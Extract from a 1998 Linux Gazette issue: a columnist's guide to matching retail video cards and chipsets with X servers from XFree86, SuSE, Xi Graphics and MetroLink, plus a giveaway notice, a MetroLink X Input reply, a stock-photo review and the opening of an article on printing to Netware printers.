Xi Graphics is pleased to announce that we're giving away free copies of the industry leading Accelerated-X Display Server.  These are full, up to date, legal and supported copies of the product.

To register to win one of the two free copies we're giving away every month, either register for the monthly draw on our web site (http://www.xig.com) or send email following the directions published below.  We do, of course, have a motive for this.  We want to know what Graphics Board, Monitor, Input devices and Operating Systems you'd most like to use with Accelerated-X and we want to find out about the kind of machine you use.

To enter the drawing by email, you must complete an entry form for that months draw.  Send the email to Andrew Bergin () with the subject "Free Draw Entry" and include in your message the following details:

Your Name
Your Company or Organisation
Your Shipping Address
Your Email Address
(Optional) Your Web Site Address
What make and model of computer, and processor speed
The Graphics Card you'd like to use
The Monitor you'd like to use
Your preferred pointing devices
Your preferred operating system
There will be a new draw every month.  You must enter each month to be eligible for that months drawing.  Only one submission per person, per drawing will be accepted.

The winners name may be put on our web site and in other promotional material.  Information collected, including your email and physical shipping address, will not be sold to any third party.  We may use your address for our infrequent mailings unless you write to ask us to remove your name from the mailing list.

Xi Graphics will pay the cost of shipping only, including international shipping.  Any and all customs charges and/or taxes are the responsibility of the winner.

indent
© 1998 by
 
© 1998
indent
Off the shelf video cards:  Choosing the right solution the first time.
Metro Link X Input Support
more musings...


Off the shelf video cards:  Choosing the right solution the first time

Video cards have come a long way in the past 2 years.  Back then a video card was considered top of the line if it handled generic 2D acceleration features and state of the art encompassed the first of the new generation of 3D accelerators.  These days 2D acceleration is common place and an expected feature of video cards and 3D acceleration is not only more common but more standardized.  In this article we'll take a look at finding off the shelf video cards, that is video cards available from your local computer retailers or by mail order, and how to match those cards with an X server.

A little background

X servers are the device drivers used in conjunction with video cards in order to display your windowing system under Linux.  Unlike the Microsoft world, where each card has its own driver, X servers tend to support many cards with a single driver.  For example, the XF86_SVGA driver from the XFree86 distribution supports many older SuperVGA cards plus the more advanced Matrox Millenium and Mystique cards.  Xi Graphics AcceleratedX server supports all of its cards with a single server that uses dynamically loaded modules depending on which video card you happen to be using and have configured.  The trick is to understand which X server to use for the video card you are using.

Since X servers work with more than one card, they tend to list which video chipset they support.  This is because many cards use similar chipsets and it is difficult for X server vendors, who up until recently had to work independent of the video card manufacturers much of the time, to keep up with all the different video card product names.  Video card manufacturers tend to use the same, relatively small, set of video chipsets for their own product lines so having a single X server to handle that entire line makes a little more sense than having a individual drivers for every card.

Why am I doing this?

Ordinary users don't really understand about chipsets, they only see the card names from manufacturers:  ATI Graphics Pro Turbo or Hercules Dynamite, for example.  Additionally, video card manufacturers are notorious for NOT specifying the chipsets they use in their cards.  They also tend to try and hide minor video card differences with name changes and pricing differences - its called carrying a product line.  Video hardware vendors are used to delivering device drivers with their hardware for the traditional desktop user, ie Microsoft users.

X servers are written by individuals or groups, outside the hardware vendors control, with chipsets in mind.  The servers (we call them servers because of the underlying X Windows architecture, but they are still just device drivers) are distributed on their own, not with the video hardware.  This is mostly because hardware vendors, in the past, really saw little market demand for doing the work on the X servers themselves.  So external entities had to do the work on their own.

So video hardware vendors sell video cards based on product names without X servers and X server software is written and described in terms of chipsets and not specific video cards.  Confused?  You're not alone.  So how does an end user resolve these different approaches and find a working combination of video card and X server?  This article won't give absolute answers for all the cards available off the shelves, but it will help educate new users as to how things work and what to look for when preparing to make a new video card purchase.

I assume here that you're reading this with an intent to purchase a new video card sometime in the near future, or that you have done so in the recent past and are trying to figure out how to make it work under X Windows with Linux.

What's the deal with all the 3D stuff?

3D hardware accelerators are hot items.  You can hardly find video cards on the shelves of your local retailers that don't mention some form of 3D support or features.  But what exactly is 3D?  And more important, do you need it?

3D cards often provide at least some of the following hardware acceleration features:

Fast computation of 3D objects.

3D objects are made up of any number of various sized triangles.  Computing the position and size of these triangles is very computationally expensive.  3D video cards can help speed up those computations.
Texture map memory.
You'll often here individual units of texture memory referred to as texels.  These are used to speed up the mapping of images to flat surfaces which can be used as a trick for high speed motion.  Its very slow to generate a tree, for example, from a large number of individual triangles than from one large flat one with a picture of a tree on it.  Done properly you might not even be able to tell this trick has been used.
Z-buffering.
The mapping of images into 3D space in video memory.  If you think of 2D space as the XY axis of a coordinate plane then the Z axis would be used to show distance in 3D space.
Flat and Gouroud shading.
The latter being what gives a smooth 3D apperance to a sphere, for example.
Shadow mapping.
This allows programmers to associate shadows with objects without having to calculate the shadow at run time.  Shadows are cast via calculations of how light moves in 3D and that can be very computationally expensive.
Bilinear filtering.
A technique that reduces artifacts when small graphics are scaled up.
Many cards provide far more features than this as well, all of which have to do with taking an object described in 3D space and displaying it (and other objects) on a flat 2D monitor.  Older 3D cards - those over a year or so in age - often had their own proprietary interface in order to access the accelerated features.  This has been superceded recently by more popular interfaces (called API's for Application Programming Interfaces) such as OpenGL (or Mesa, a free implementation of OpenGL) or the 3Dfx Glide interface.

Making use of 3D hardware acceleration requires that you have

  1. An X server or other video driver that can drive this card.
  2. Application software that knows how to speak the API for that card.  Usually this is an application that speak OpenGL/Mesa or Glide on Linux systems.  The way this works is that the application speaks the API language only and doesn't care if 3D acceleration is done in hardware or software.  The API, ie OpenGL or Glide, then understands how to use hardware acceleration.  In some cases this will be by direct support from the X server and in other cases it will be by utilizing a separate driver for the 3D card.


    There are also cards that support Microsoft's Direct3D API, an alternative to the OpenGL API.  Don't bother with these cards if you are looking for 3D acceleration because as of now there are not only no drivers for them, there aren't any applications on Linux that speak this API language.

At the moment there are not that many OpenGL/Mesa applications that end users might be interested in.  A few 3D modellers, such as AC3D or 3dom, use OpenGL but most of the support for OpenGL comes in the form of windowing toolkit extensions.  These are developers tools and beyond the scope of this discussion.

3D video cards under Linux normally work in one of three ways:

  1. mulitple cards using pass through cables
  2. mulitple cards using multiple monitors
  3. single card handling both 3D acceleration and standard SVGA (2D) acceleration
In the fist two cases you have two cards:  your regular VGA/2D card and the 3D video card.  You would have an external driver that runs the 3D card while using your X server to drive your regular video card.  This is how the early support for Voodoo cards (Voodoo is a chipset from 3Dfx used in various 3D cards produced by other manufacturers) in Mesa worked (see the 3Dfx Howto).  With pass through cables you had your regular VGA output passed through your 3D card which would pass it directly to its output port unless a 3D driver had turned the card "on".  Once enabled, the 3D card would ignore the signal coming from the 2D card.  This works fine most of the time unless your 3D application dies and doesn't tell the 3D card to start passing through the 2D signal again.  In either case where multiple cards are used the standard VGA card knows nothing about the 3D card and works just like it always has.

If your X server supports the 3D card directly you can skip using two cards and run just the 3D card.  In some situations you won't get the 3D acceleration but will get to use the generally faster 2D features of that card.  And there are some X servers that will provide the 3D acceleration too, so you get the best of both worlds.

Hardware issues of 3D cards

You can run PCI or the new AGP buses with these 3D video cards.  AGP is Intel's Advanced Graphics Port which allows faster throughput between the CPU and graphics cards.

Older cards used VRAM or EDO DRAM memory.  Newer cards run the faster SVRAM or SGRAM.  Not being hardware literate all I can say is that the SGRAM is reported to be much faster due to the way it is more closely tied into the video processor than the other forms of video memory.  I asked Jeremy Chatfield at Xi Graphics and Paul Sargent at 3Dlabs for an explanation of these memory types.  Jeremy provided the following answer:

Basic differences:

Paul provided similar information but in quite a bit more detail.

Some 3D cards also offer NTSC output plugs so you can connect the card to a TV, presumably to get a larger physical screen (although at the same resolution).  I've never seen this however so can't really say much about its use.

Do you need 3D acceleration?

For the most part, no.  Outside of games or visualization software it doesn't come into play much for the average Linux user.  For example, it doesn't speed up word processing, the Gimp, or POV-Ray renders (which are CPU and memory bound).  If you *are* into games or need off the shelf 3D support for visualization software (ie realtime 3D rendering with OpenGL or Mesa) then it can provide significant increases in speed for rendering operations.  The problem is that support for the 3D hardware acceleration is just beginning to show up within the X servers themselves and running concurrent video cards (one for 2D and one for 3D) is not for the technically challenged.

Instead, look to these cards for their future potential.  Cards that support either OpenGL (which is likely to be around for some time) or 3Dfx's Glide API (which is quite popular with game enthusiasts on non-Unix platforms) are your best bet right now.  Additionally, they're increased 2D acceleration will be a significant benefit to you in your day to day use.

What happened to 2D?

Nothing, its still there and basically everybody supports it now.  2D accerlation has to do with generic line drawing techniques, which speeds the drawing of windows for example.  Any modern card - something made within the past 2 years - will support 2D acceleration.  The advantage with newer cards is that they use faster memory and better acceleration for these 2D effects so ordinary use of windowing applications will look and feel much improved over older cards.

Most cards now come with 1M or 2M of memory which will get you resolutions of about 1024x768 @ 65K colors.  But the cost of these cards has dropped drastically in the past year or so and getting a card with 4M of video memory will get you 1280x1024 @ 16 million colors, certainly good enough for most applications and reasonably affordable monitors.  Go higher (more memory - 8Mb or higher) only if 3D work is of real importance to you or if you expect to have very large displays running at full 24-bit color depths.

What are currently the popular chipsets?

There are lots of others for various other cards but these seem to have the most noise being made about them in the press and certainly seem to have the biggest presence in cards available at the local retail outlets.

What is on the shelves now?

Note that this is only based on what I found at three local retailers (although all three are national in scope) or via C|Net's Computers.com.  Also, prices vary depending on the amount of video memory on the card, so just use these prices as guidelines.  All prices are in US dollars.  I've tried to list the chipsets for these cards if I could find them.  Finally, these cards may be PCI, AGP or both - you'll just have to check on that aspect on your own.
 

Video Card Chipset Price
ATI All in Wonder  3D Rage II $125
ATI All in Wonder Pro  3D Rage Pro $151
ATI Xpert@Play PCI and AGP 3D Rage Pro $150
ATI Xpert 98 ATI Rage Turbo $90
Creative Labs Graphics Blaster Extreme, Professional Edition Permedia 2 $183
Creative Labs Graphics Blaster Extreme, Value Edition Permedia 2 $53
Creative Labs Graphics Blaster  RIVA TNT $175
Diamond Stealth II S220 Rendition Verite $100
Diamond Monster 3D Permedia 2 $250
Diamond Monster II Voodoo 2 $250
Diamond Viper V330 RIVA 128 $130
Diamond Fire GL 1000 Permedia 2 $???
Diamond Fire GL 1000 Pro Permedia 2 $144
Diamond Stealth 2000 S3 ViRGE $???
Elsa GLoria Synergy Permedia 2 $120
Elsa WINNER 2000 / Office Permedia 2 $???
Hercules Dynamite 3D/GL Permedia 2 $180
Hercules Thriller 3D Rendition V2200 $109
Hercules Terminator 2X/i  Intel I740i $80
Hercules Stingray 128 3D Unknown $160
Hercules Terminator Beast  S3 Savage 3D $120
Jaton S3 Video S3ViRGE/DX $40
LEADTEK WinFast 2300 Permedia 2 $???
Matrox Mystique G200 MGA-G200 $150
Matrox Millenium G200 MGA-G200 $150
STB Velocity 128 RIVA TNT $150
STB Velocity 4400 RIVA TNT $200

Its interesting to note the differences in different cards from the same companies.  For example, upon examination of the packaging for the Matrox Mystique and Millenium the only differences that I could find where that the Mystique runs at 230Mhz and has S-Video and Composite outputs whereas the Millenium runs at 250Mhz and does not have S-Video or Composite outputs.

Again, these are the off the shelf, "affordable" cards.  Really high end cards can run into the $2000-$3000 range and higher and chances are slim that most of those cards have X server support yet.  And there are plenty of other cards out there too - like I said, vendors love to change minor details and release it as a whole new product.

What do the various vendors currently support?

Ok, so now you know a little about what video cards are currently available and a little about the 2D/3D technology being used in them.  How does this map to the available X servers?  That depends on which server vendor you want to use.  In this article we consider 4 vendors:  XFree86, S.u.S.E (for their binary only versions that currently require non-disclosure agreements), Xi Graphics and MetroLink.

Of all the vendors, MetroLink made it the easiest to find card names from their web site.  SuSE's site was pretty good about it too.  Xi Graphics has a fairly decent lookup system, but they mix chipsets with board vendors and if you don't know what you're looking for it can be a bit confusing since they support so many variations.  XFree86, although they have plenty of documentation, do not make it simple to match a card by name with a driver.  Give them credit for writing great software - now they need someone to organize and collate all that documentation on their web site for the average user.

Red Hat has a hardware compatibility list, but its not obvious where to find it.  Try "JumpWords" at the bottom of main page, choose "Hardware" and then the distribution you are currently running.  These lists are by far better than any of the X server vendor lists because they tell you specifically which card goes with which server.  Since Red Hat is shipping the XFree86 server this list is applicable to both S.u.S.E. and XFree86.  Note:  if you get to this list via the Red Hat main site (www.redhat.com) and you want to get a printable version of that page, select "No Frames" at the bottom of the page.  The link below, however, will take you straight to the list.

http://www.redhat.com/support/docs/rhl/intel/rh51-hardware-intel-11.html
Caldera's site does not have any such obvious hardware compatibility list.  A search for "hardware compatibility" returns as the first entry a link to video card compatibility list for XFree86 - but the link is invalid!  They definitely need to work on their site structure.  Neither Slackware (via Walnut Creek's web site) nor InfoMagic are set up to provide this sort of user information.

XFree86

This one is actually the easiest of the bunch, but don't start your search on the XFree86 site to figure it out.  Instead, take a look at Red Hat's online list of supported hardware.   They have video cards listed there sorted by which server supports which card.

Using the set of cards listed previously, the following servers are expected to work (not all cards listed previously were listed on the Red Hat supported hardware list):
 

Video Card XFree86 Server (all prefixed with "XF86_")
ATI All in Wonder Mach64
ATI Xpert@Play Mach64
Creative Labs Graphics Blaster Extreme, Professional Edition SVGA
Creative Labs Graphics Blaster Extreme, Value Edition SVGA
Diamond Viper V330 SVGA
Diamond Stealth 2000 S3V
Elsa WINNER 2000 / Office S3V
Hercules Dynamite 3D/GL  SVGA (maybe)
Hercules Terminator 2X/i SVGA (maybe)
Hercules Stingray 128 3D SVGA
Jaton S3 Video S3V (reported from one respondent)
Matrox Mystique G200 SVGA
Matrox Millenium G200 SVGA
STB Velocity 128 SVGA
STB Velocity 4400 SVGA (maybe)

You can, additionally, look on the XFree86 site to get more information.  The following list is one I gathered from perusing the www.xfree86.com web site.  Note that many of the listed cards are older models and not typically what you'll find on the shelves these days.  Still, you may be able to purchase some of these by mail order.
 

Servers Cards
SVGA ATI: GAWonder series:  VGAWonder V3, VGAWonder V4, VGAWonder V5, VGAWonder+, VGAWonder XL, VGAWonder XL24, VGA Basic 16, VGA Edge, VGA Edge 16, VGA Integra, VGA Charger, VGAStereo F/X, VGA 640, VGA 800, VGA 1024, VGA 1024D, VGA 1024 XL, VGA 1024 DXL, VGA 1024 VLB

Matrox:  Millennium (MGA2064W) with Texas Instruments TVP3026 RAMDAC.  It has been tested with 175MHz, 220MHz and 250MHz versions of the card with 2MB, 4MB and 8MB WRAM.  Millennium II (MGA2164W) both PCI and AGP with Texas Instruments TVP3026 RAMDAC.  It has been tested with 220MHz and 250MHz versions of the card with 4MB, 8MB and 16MB WRAM.  Mystique with 170 and 220 MHz integrated RAMDACs (both MGA1064SG and MGA1164SG).

Mach8 series Graphics Ultra, Graphics Vantage, VGAWonder GT (None of the 8514/Ultra and 8514 Vantage series is supported at this time)
Mach32 series Graphics Ultra+, Graphics Ultra Pro, Graphics Wonder, Graphics Ultra XLR, Graphics Ultra AXO, VLB mach32-D, PCI mach32-D, ISA mach32
Mach64 series Graphics Xpression, Graphics Pro Turbo, Win Boost, Win Turbo, Graphics Pro Turbo 1600, Video Xpression, 3D Xpression, Video Xpression+, 3D Xpression+, All-In-Wonder, All-In-Wonder PRO, 3D Pro Turbo, ATI-TV, XPERT@Play, XPERT@Work, XPERT XL
S3 Orchid Fahrenheit 1280+ VLB
STB PowerGraph X.24 S3 (ISA), Pegasus VL, Velocity 64
Diamond Stealth 24 VLB, Stealth 64 DRAM
ELSA Winner 1000 ISA/EISA (``TwinBus'', not Winner1000ISA!!), Winner 1000 VL, Winner1000PRO VLB,  Winner1000PRO PCI
#9 GXE Level 10, 11, 12, 14, 16, GXE64 - PCI, Pro VLB, Pro PCI, Trio64, FX Motion 771
S3V (ViRGE) Supports PCI hardware, ViRGE, ViRGE/DX, ViRGE/GX, ViRGE/GX2, ViRGE/MX, and ViRGE/VX, but no specific cards were listed.  Newer support has been moved to the SVGA server.
P9000 Diamond Viper VLB and PCI cards

This is not a complete list, but does cover most of the off the shelf cards you may run into at local retailers or on the Internet.

All binary versions of the XFree86 servers can be found at ftp://ftp.XFree86.org/pub/XFree86/current/binaries/<OS>
For example, Linux/Intel would be under ftp://ftp.XFree86.org/pub/XFree86/current/binaries/Linux-ix86/Servers/.
Additionally, a properly installed Linus system with the XFree86 run time system (which includes X11 libraries, clients and X servers) should contain the file /usr/X11R6/lib/X11/Cards listing the current known set of supported cards.
 

S.u.S.E

SuSE (www.suse.com), which is known primarily as a Linux distributor more than as an X server vendor, has a searchable database of graphics cards.  From their main page choose "Hardware DB", then "Graphics Cards" from the scrollable list of topics.  The DB search results are fairly informative but are titled in German.  Don't let that throw you since the real info you're looking for is basically language independent when its displayed.

Since S.u.S.E. ships the XFree86 servers along with a few of their own servers (usually developed initially under NDA until S.u.S.E. can get them into the XFree86 distribution), I'll just list those servers for which I could not find an XFree86 server specifically listed by Red Hat or the XFree86 web site.
 

Card Server
Diamond Stealth II S220 rendition
Diamond Fire GL 1000 Pro glint
Elsa GLoria Synergy glint
Hercules Thriller 3D rendition
LEADTEK WinFast 2300  unknown - its listed but no server is given

Additionally, S.u.S.E. servers are based on XFree86 servers but with extended features.  These updates will be or have already been incorporated into the next XFree86 releases.
 

XFCom_Matrox
Matrox Millennium G200 AGP
Matrox Millennium II (PCI und AGP)
Matrox Millennium
Matrox Mystique
XFCom_3DLabs server
GLINT MX + GLINT Delta + IBM RGB 526DB:
ELSA GLoria L/MX
GLINT 500TX + GLINT Delta + IBM RGB 526DB:
ELSA GLoria L
DIAMOND Fire GL 3000
GLINT MX + GLINT Delta + IBM RGB 640:
ELSA GLoria XL


PERMEDIA + GLINT Delta + IBM RGB 526DB:

ELSA GLoria S
DIAMOND Fire GL 1000
PERMEDIA-2:
ELSA GLoria Synergy
ELSA WINNER 2000/Office
DIAMOND Fire GL 1000 Pro
CREATIVE Blaster Exxtreme
LEADTEK WinFast 2300
Basically, most cards with Permedia 2 or Permedia 2v chipset (including AGP versions) should work.
After searching the XFree86 sites (www.xfree86.com, Red Hat and S.u.S.E.) I was still unable to find drivers for the following cards: All of the S.u.S.E specific X servers can be found at http://www.suse.de/XSuSE/XSuSE_E.html.

Xi Graphics AcceleratedX

Unlike the architecture of the XFree86 project, the two commercial server vendors deliver what is essentially a single driver with support for all video cards handled through loadable object modules.  The essential difference here is that with the commercial vendors you load their package and then configure based on card configurations without having to worry about which module to load.  Its a one-step difference, essentially, since with XFree86 you need to know ahead of time which server to configure.  With the commercial vendors there is really just the one server, but you still have to give it much of the same configuration information you have to give XFree86.

Unlike XFree86 and MetroLink, Xi Graphics lists the Chip Type used in cards by their technical numbers instead of their names.  You can see this if, under Xsetup, you select a Graphics Board and then hit TAB.  The small window that opens lists various card information, such as the ATI264GT Chip Type for the ATI All In Wonder card.  Although graphics cards vendors don't always list the names of the chipsets (like 3D Rage or Rendition Verite), they are even less likely to list the Chip Type.  Fortunately, the set of named boards in Xi Graphics lists is quite large and the need to find a specific chipset may not be quite so important.

The following cards, from the list of cards given previously, were found in the Xsetup tool under Graphics Boards for the 4.1.2 server:

ATI All in Wonder (3D Rage II)
ATI All in Wonder Pro (3D Rage Pro)
ATI Xpert@Play PCI and AGP (3D Rage Pro)
Diamond Fire GL 1000 (Permedia 2)
Diamond Fire GL 1000 Pro (Permedia 2)
Elsa GLoria Synergy (Permedia 2)
Elsa WINNER 2000 / Office (Permedia 2)
Hercules Dynamite 3D/GL (Permedia 2)
Hercules Stingray 128 3D
LEADTEK WinFast 2300 (Permedia 2)

The following cards were not found specifically by name, but they may be supported anyway using a configuration for a similar card.  You need to check with Xi Graphics to be certain.  Remember:  these cards might only have minor differences from similar cards from the same vendor.  However, since Xi lists these with Chip Types instead of chipset names, its not obvious that the card might work.

Additionally, Xi Graphics recently announced support for hardware accelerated OpenGL in a demonstration only version of their "Accelerated-X/OGL Technology Demo".  Chips supported include the Number 9 Ticket To Ride IV, 3Dlabs Permedia 2, Intel 740, 3Dlabs GLINT Delta + MX, and SiS 6326.  They also specify that Wacom tablets are explicitly supported along with Logitech Magellan (a "spaceball" device).

XFree86 does not currently support hardware accelerated OpenGL directly in their X servers.  A release date for the official version of Xi Graphics hardware accelerated OpenGL has not been announced at the time of this writing.

Accelerated-X runs for $99.95 for US shipments, with upgrade pricing starting at $49.95.  Xi Graphics can be found on the net at http://www.xig.com.

MetroLink MetroX

MetroLink has also announced hardware acceleration for OpenGL with their "Extreme3D" product.  This product is expected to ship in December 1998, according to the press release at http://www.metrolink.com/extrem3d.html.  However, I was told by Chris Bare at MetroLink that its more likely to be January 1999.  The press report states that support will be available for the following chipsets:

Like Xi Graphics, MetroLink has the one server which supports many cards and chipsets through loadable modules.  Since this architecture doesn't require I list matching servers to cards, I'll just list the cards and chipsets MetroX reports to support:
 
 Card Chipset
 ATI 3D RAGE 
 ATI 3D RAGE II 
 ATI ALL-IN-WONDER PRO AGP 
 ATI ALL-IN-WONDER PRO PCI 
 ATI Graphics Pro Turbo 
 ATI Graphics Ultra 
 ATI Graphics Xpression 
 ATI Mach32 
 ATI Mach64 
 ATI VGA STEREO-F/X 
 ATI Winturbo PCI 
 ATI XPERT@Play 
 ATI XPERT@Play AGP 
 ATI XPERT@Work 
 ATI XPERT@Work AGP 
 Diamond Fire GL 1000Pro 
 Diamond SpeedStar 24X 
 Diamond SpeedStar Pro SE 
 Diamond Stealth 24 
 Diamond Stealth 32 
 Diamond Stealth 3D 2000 
 Diamond Stealth 64 
 Diamond Stealth 64 DRAM 
 Diamond Stealth 64 DRAM (SDAC) 
 Diamond Stealth 64 Graphics 2000 Series 
 Diamond Stealth 64 Graphics 2200 
 Diamond Stealth 64 VRAM 
 Diamond Stealth 64 Video 3000 Series 
 Diamond Stealth 64 Video VRAM 
 Diamond Stealth Video (SDAC) 
 Diamond Stealth Video 2000 Series 
 Diamond Viper (110 MHz RAMDAC) 
 Diamond Viper (135 MHz RAMDAC) 
 ELSA GLoria Synergy 
 ELSA Victory 3D 
 ELSA Winner 1000 TRIO/V 
 ELSA Winner 2000 AVI 
 ELSA Winner 2000 PRO/X-2, -4 
 ELSA Winner 2000 PRO/X-8 
 Matrox Marvel 
 Matrox Marvel II 
 Matrox Millennium 
 Matrox Millennium II AGP 
 Matrox Millennium II PCI (220 MHz) 
 Matrox Millennium II PCI (250 MHz) 
 Matrox Mystique 
 Matrox Mystique 220 
 Number Nine GXE64 
 Number Nine Imagine 128 
 Number Nine Imagine 128 Series 2 
 Number Nine Motion 531 
 Number Nine Motion 771 
 Number Nine Revolution 3D 
 Number Nine Vision 330 
 Orchid Kelvin 64 
 STB NITRO 3D 
 STB/Symmetric GLyder MAX-2
3D RAGE
3D RAGE II
3D RAGE PRO
3D RAGE PRO
Mach64
Mach8
Mach64
Mach32
Mach64
ATI 28800
Mach64
3D RAGE PRO
3D RAGE PRO
3D RAGE PRO
3D RAGE PRO
PERMEDIA 2
Western Digital 90C31
Cirrus 5430
S3 801
ET4000/W32p
S3 ViRGE
S3 964, Bt485KPJ135
S3 Trio64
S3 864, S3 SDAC
S3 864, S3 SDAC
S3 Trio64
S3 968, IBM RGB526CF22
S3 968, TI 3026-175
S3 968, TI 3026-175
S3 868, S3 SDAC
S3 868, S3 SDAC
P9000
P9000
PERMEDIA 2
S3 ViRGE
S3 Trio64V+
S3 968, TI 3026-175
S3 968, TI 3026-220
S3 968, IBM RGB528CF25
ET4000
ET4000
MGA Storm
MGA 2164, TI 3026-250
MGA 2164, TI 3026-220
MGA 2164, TI 3026-250
MGA 1064
MGA 1164
S3 864
Imagine 128
Imagine 128 Series 2
S3 868
S3 968
Ticket to Ride
S3 Trio64
Cirrus 5434
S3 ViRGE/GX
PERMEDIA 2

MetroLink's web site is at http://www.metrolink.com.  Platform specific information for Linux can be found at
Intel: http://www.metrolink.com/metrox431-intel/cardlist4.3.1.html
Alpha: http://www.metrolink.com/metrox431-alpha/cardlist4.3.1.html

The MetroLink site currently lists their Metro-X Enhanced Server Set 4.3 for $39 and support it on both Intel/x86 and Alpha based Linux systems.  With the price drop to $39, the upgrade pricing policies have been dropped by MetroLink.

The future

C|Net reported recently that there were some 40 or so computer graphics chip vendors in the 3D market today.  This is far more than the industry can sustain and an eventual consolidation is inevitable.  Furthermore, all three of the major CPU vendors - Intel, Cyrix and AMD - currently have plans for integrating graphics functions into the CPU itself.  The graphics card world is changing fast and its not quite clear what effect this will have on end users.  If you work in with computer graphics it will be necessary to keep abreast of upcoming changes.

A Final Word, or Words

There are a couple of things I didn't cover in this artle:

MPEG - I don't know if X servers support hardware decoding of MPEGs, animated files that are highly compressed, yet but I suspect they don't.  You can view these animations using software to decode the MPEG.  This works, but software decoding will always be slower than hardware decoding.
Laptops - Laptop vendors, at least in the recent past, didn't like to give out too much information on their video subsystems because it was one way to maintain a product differentiation with competitors.  More support has come recently and you can expect to see better information on which laptops are supported under X Windows in the coming months.  For now, check out the following pages:  http://www.cs.utexas.edu/users/kharker/linux-laptop/
NeoMagic chipsets are being used in many laptops these days.  XFree86 (via either Red Hat and/or S.u.S.E) and Xi Graphics definitely have servers for these chips that are known to work on at least some laptops.  MetroLink may as well, but I didn't check on this since I wasn't going to concern myself too deeply with laptop issues.
Its hard to keep up with vendor naming schemes and matching them to chipsets.  Thats why X server vendors don't do it that often.  Its a situation that has developed due to the fact the PC video cards grew up in a world without X Windows, and X servers grew up (originally, quite some time ago) in a world without PCs.  Its the nature of the beast, you might say.  But things are changing now.  With the acceptance of Linux in the corporate world you will begin to see video card vendors show much more interest in the X Windows world.  How that will equate to users matching video cards with X servers remains to be seen, but I expect life to get much easier in the next year.

Confused?  Me too, but its not that hard to digest when you think of it this way:  You'll buy a 3D card because thats what on the shelves at retailers and you'll either have or not have support for the actual 3D acceleration.  As long as a driver exists for the card you at least be able to run X Windows and nearly all the applications available for it.

If you're looking for a cheap card you can still find them on the Net.  Take a look at Computers.com under their graphics and sound section and do searches by company name (e.g. "matrox").  You'll find a number of older 2D boards listed with links on where you can buy them.  These cards run well under $100, some for as low as $30.

Acknowledgements

I'd like to thank a number of people for their assistance in putting this article together.  Paul Sargent of 3Dlabs was especially helpful, providing definitions and information on what I'm sure to him must be real beginner questions.  Jeremy Chatfield provided similar help.  Along with these two, I received helpful bits of information from Dirk Hohndel of S.u.S.E, many members of the Boulder Linux Users Group, Federico Mena Quintero and Miles O'Neal.

Dirk Hohndel () asked that I mention the outstanding support given to XFree86 by ELSA.  Other companies that have provided support to them include ATI, Number 9, Matrox, and Diamond.

Sites for further reading:

3Dfx drivers in RPM format are available at: http://glide.xxedgexx.com/3DfxRPMS.html

The 3Dfx howto (http://www.gamers.org/dEngine/xf3D/howto/3Dfx-HOWTO.html) is an excellent document for information about using 3D hardware accelerated boards with Linux.  It focuses on 3Dfx boards, but describes some of the hardware related issues that other boards will encounter, such as AGP vs PCI.  Definitely a good read for anyone looking to get 3D hardware acceleration working.

Xi Graphics:  http://www.xig.com
MetroLink:  http://www.metrolink.com
XFree86:  http://www.xfree86.org
S.u.S.E.:  http://www.suse.com
Red Hat:  http://www.redhat.com

Some good sites for hardware specific information (although likely to be somewhat Microsoft oriented):



Metro Link and X Input Support
As usual, I didn't get around to writing my Muse column till very late in the month last month.  Because of this MetroLink didn't get the opportunity to supply information regarding their X Input support before my deadline.  My apologies to them.  Here is the information they provided, sent by :
Sorry I didn't reply sooner, we had a pesky hurricane to deal with and were closed Thursday and Friday.

Presently, we do not support any tablets through X Input. Our server supports X Input drivers as loadable modules and we have technical specs available so that third parties can write drivers. At present no one has attempted to port the Wacom tablet driver to our new architecture (BTW, this new loadable design will be donated to Xfree86 for their 4.0 release)

Our configuration tool includes a touch screen calibration utility that works in graphics mode.

Here's the list of X Input drivers we currently support:

The only thing I know of that can use [3D Input Devices] is GLUT, and even then you have to write (relatively simple) GLUT code to integrate them into glut programs.  We also include sample code on our web page that shows how to access them from your own programs.

Here's the URL for info on the 3D devices:
http://www.metrolink.com/support/3dinput.html

indent
© 1998 by

© 1998
indent
Of course, now you're probably asking "What the images look like and what can I do with them?"  Lets start by showing what a couple of the images I created using the Gimp and these stock photos look like.  The first of these I called Vogue and whipped out in a couple of hours just for this article (intermixed with watching a rerun of The X-Files - I really need to get out more).  The second is called Angel and took me a few days to put together.  Both images started with stock photos from the Women by Jack Cutler CD in the Sampler Ten Pack.
 
Vogue Angel
       Note: click either image to see larger version.

 
 
Original portrait used for Vogue artwork. Original portrait used in Angel (scaled up from actual thumbnail image)

 
Additionally, Angel includes an image taken from the Dawn & Dusk CD plus a texture from one of the Textures II CD's (although I can't remember which one now).  The Women and Dawn & Dusk CDs are both in the Sampler Ten pack.

These particular example images aren't really helpful for most Web based applications, but what is important is the quality of the original stock.  The original images are of good quality, clear of defects and of reasonable color clarity.  If you consider the range of topics covered by the other Super Ten Packs then there is likely to be some set of images which will be useful in any future web artwork you may do.  When you consider that stock photographs often run closer to $200-$300 for 100 images on other collections, the Corel Super Ten Packs are a pretty decent bargain and well worth the cost.


Thumbnail of sunset image used
in Angel.

 
 
 
indent
© 1998 by

"Linux Gazette...making Linux just a little more fun!"


How to print to a Printer on a Netware server

By


Introduction


To understand the circumstances which led to me writing this little article, I have to explain a few things first. I am a student at the university of Stellenbosch in South Africa. We have a lot of Netware Servers on Campus, and most of the printers used by students are connected to one of these servers. A while ago I installed Linux for two friends of mine. They were quite impressed with the performance, and after a while the decision was made to install Linux on two of the other computers too. To make the switch from Windows to Linux as smooth as possible, one of the requirements of the new setup was that the Linux PC's should be able to print to the Netware printer upstairs, without any aditional steps (Saving as text, converting to postscript, and printing with nprint), in other words, point and click the way windows users do it all the time. This article explains how I did it.

This article assumes that you'll be using only one printer, that is the Netware printer. Because this procedure includes replacement of the print spooler daemon, I do NOT recommend this procedure for a working installation with one or more printers (unless of course you know what you're doing, but then you won't be reading this now would you? :) ). Also, most of the instructions are rather Redhat specific, if you are using another distribution, ask someone to translate :)


How does it work?


A print spooler is a program that accepts print jobs from computers on the network. Usually the print jobs are stored on disk until the printer becomes available again. The print spooler program also places an exclusive lock on the device your printer is connected to, usually /dev/lp1. This prevents other users or programs from printing while the print spooler is busy.

The print spooler does however do no formatting of its own. It merely stores what ever you sent it in a disk file, then send it to the printer when it becomes available. To have some kind of intelligent formating, filters are used. A print filter will determine the type of data passing through it, and peform conversions on it. This means that it doesn't matter what you send to the printer, the printer will always get something printable, usually postscript.

Filters also makes it possible to do a few nice things. Since a filter is actually nothing more than a small program that reads from stdin and writes to stdout, we can write filter programs that can do almost anything. In this case, I made it send the job to a Netware server.


Requirements

You need the latest versions of:

